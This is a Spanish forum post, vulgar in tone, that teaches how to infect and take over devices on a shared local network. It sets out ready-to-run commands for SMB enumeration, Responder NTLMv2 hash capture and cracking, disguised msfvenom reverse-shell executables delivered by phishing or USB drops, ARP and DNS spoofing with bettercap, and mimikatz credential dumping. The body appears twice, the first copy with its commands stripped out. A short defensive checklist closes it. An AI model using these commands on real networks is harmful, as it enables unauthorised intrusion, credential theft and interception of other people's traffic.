En este post te voy a enseñar lo básico para poder infectar dispositivos conectados a nuestra misma red, puede ser pública o privada, nos suda la polla basto. Nuestro objetivo va a ser obtener una puta shell o algo del palo sobre un dispositivo con windows, linux, IoT o lo que pollas sea.
Reconocimiento
El primer paso será hacer un breve reconocimiento de los dispositivos en red, para ver sobre lo que vamos a tener que trabajar para ello podemos ejecutar los siguientes comandos
Escaneo pasivo:
Escaneo activo con información de OS y puertos:
Escaneo visual y más detallado:
Explora con nbtscan y smbclient:
Una vez escaneados los dispositivos tendremos que emplear un método diferente para cada caso, te dejo los más comunes pedazo de gordo.
1.- Compartidos SMB
Revisar si puedes acceder sin credenciales, si estás empezando en htb esto te resultará familiar:
Si ves algo tipo:
Si tienes permisos de escritura:
Otras herramientas útiles:
2.- Ataques LLMNR/NBNS + Responder
Algo que tienes que saber es que cualquier red con Windows es vulnerable si algún retrasado no desactivó el LLMNR/NBNS.
Lanzamos el Responder:
Captura hash NTLMv2:
Crackea con john o hashcat:
¿Tienes el pass? Entra:
O con crackmapexec:
También puedes usar Multirelay para inyectar directamente sin password
.
3.- Ingeniería Social + Payload (Este es el más mierda de todos pero funciona aunque parezca que no)
Creamos el payload:
Opcional: firmarlo o bindearlo con otro .exe real:
Entrega:
Escuchas con Metasploit:
Cuando haga doble clic, entras con:
4.- Abuso de protocolos inseguros
Si hay impresoras, routers o IoTs en la red, escanea así:
Prueba conexiones:
Credenciales por defecto:
admin:admin
root:toor
user:1234
Bases de datos comunes:
Si hay interfaz web: fuzz con ffuf o gobuster:
Revisa exploits con:
5.- Envenenamiento de red (ARP spoofing + DNS Spoof)
ARP Spoof + Sniffing con Bettercap:
En consola interactiva:
Captura POSTs, cookies, FTP creds...
DNS Spoofing:
En bettercap:
Ahora todo lo que intente abrir google.com irá a tu IP.
6.- Post-infección: moverse lateralmente
¿Ya tienes acceso a un host? Saca las creds guardadas:
Luego:
Revisa redes con:
Enumera con BloodHound o PowerView si es entorno Windows, esto nos facilitará poder pivotar en el caso de quererlo en un futuro.
De nuevo para todos esos frikis que sean del blue team...
Reconocimiento
El primer paso será hacer un breve reconocimiento de los dispositivos en red, para ver sobre lo que vamos a tener que trabajar para ello podemos ejecutar los siguientes comandos
Escaneo pasivo:
Código:
arp -a # Tabla ARP local (básico, rápido)
netdiscover -r 192.168.1.0/24
Escaneo activo con información de OS y puertos:
nmap -sS -T4 -p- -O -sV 192.168.1.0/24 --open
Escaneo visual y más detallado:
sudo nmap -A -T4 -oN fullscan.txt 192.168.1.0/24
Explora con nbtscan y smbclient:
Código:
nbtscan -r 192.168.1.0/24
smbclient -L //192.168.1.X/ -N
Una vez escaneados los dispositivos tendremos que emplear un método diferente para cada caso, te dejo los más comunes pedazo de gordo.
1.- Compartidos SMB
Revisar si puedes acceder sin credenciales, si estás empezando en htb esto te resultará familiar:
smbclient -L //192.168.1.X/ -N
Si ves algo tipo:
Código:
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
public Disk Public Share
smbclient //192.168.1.X/public -N
Si tienes permisos de escritura:
put payload.exe
Otras herramientas útiles:
Código:
crackmapexec smb 192.168.1.0/24 --shares
enum4linux-ng -A 192.168.1.X
2.- Ataques LLMNR/NBNS + Responder
Algo que tienes que saber es que cualquier red con Windows es vulnerable si algún retrasado no desactivó el LLMNR/NBNS.
Lanzamos el Responder:
sudo responder -I wlan0 -v
Captura hash NTLMv2:
Código:
[SMB] NTLMv2-SSP Client : 192.168.1.15
[SMB] NTLMv2-SSP Username : PC-USER\victim
[SMB] NTLMv2-SSP Hash : victim::PC-USER:112233...:112233...
Crackea con john o hashcat:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
¿Tienes el pass? Entra:
psexec.py victim:contraseña@192.168.1.15
O con crackmapexec:
crackmapexec smb 192.168.1.15 -u victim -p contraseña --exec-method smbexec
También puedes usar Multirelay para inyectar directamente sin password

3.- Ingeniería Social + Payload (Este es el más mierda de todos pero funciona aunque parezca que no)
Creamos el payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o actualizacion.exe
Opcional: firmarlo o bindearlo con otro .exe real:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x calc.exe -f exe -o camuflado.exe
Entrega:
- Por SMB compartido
- Phishing (correo interno, WhatsApp, QR, USB drop, etc.)
- Hosting con HTTP simple:
python3 -m http.server 8080
Escuchas con Metasploit:
Código:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run
Cuando haga doble clic, entras con:
Código:
meterpreter > sysinfo
meterpreter > shell
4.- Abuso de protocolos inseguros
Si hay impresoras, routers o IoTs en la red, escanea así:
nmap -p 23,80,554,8000,8080,8888 192.168.1.0/24 --open
Prueba conexiones:
Código:
telnet 192.168.1.45
ssh admin@192.168.1.45
Credenciales por defecto:
admin:admin
root:toor
user:1234
Bases de datos comunes:
Código:
ftp 192.168.1.50
mysql -h 192.168.1.50 -u root -p
Si hay interfaz web: fuzz con ffuf o gobuster:
gobuster dir -u http://192.168.1.45/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Revisa exploits con:
searchsploit tplink
5.- Envenenamiento de red (ARP spoofing + DNS Spoof)
ARP Spoof + Sniffing con Bettercap:
sudo bettercap -iface wlan0
En consola interactiva:
Código:
net.probe on
net.recon on
set arp.spoof.targets 192.168.1.45
arp.spoof on
net.sniff on
Captura POSTs, cookies, FTP creds...
DNS Spoofing:
En bettercap:
Código:
set dns.spoof.domains google.com,youtube.com
set dns.spoof.address 192.168.1.100
dns.spoof on
Ahora todo lo que intente abrir google.com irá a tu IP.
6.- Post-infección: moverse lateralmente
¿Ya tienes acceso a un host? Saca las creds guardadas:
Código:
mimikatz
sekurlsa::logonpasswords
Luego:
wmiexec.py domain/user:pass@host
Revisa redes con:
Código:
arp -a
route print
ipconfig /all
Enumera con BloodHound o PowerView si es entorno Windows, esto nos facilitará poder pivotar en el caso de quererlo en un futuro.
De nuevo para todos esos frikis que sean del blue team...
- Desactiva LLMNR/NBNS
- Segmenta IoT y usuarios
- Usa detección ARP spoof y Responder
- Apaga SMBv1 y servicios innecesarios
- Aplica credenciales fuertes y rotación
- Monitoriza logs (Sysmon, Wireshark, ELK)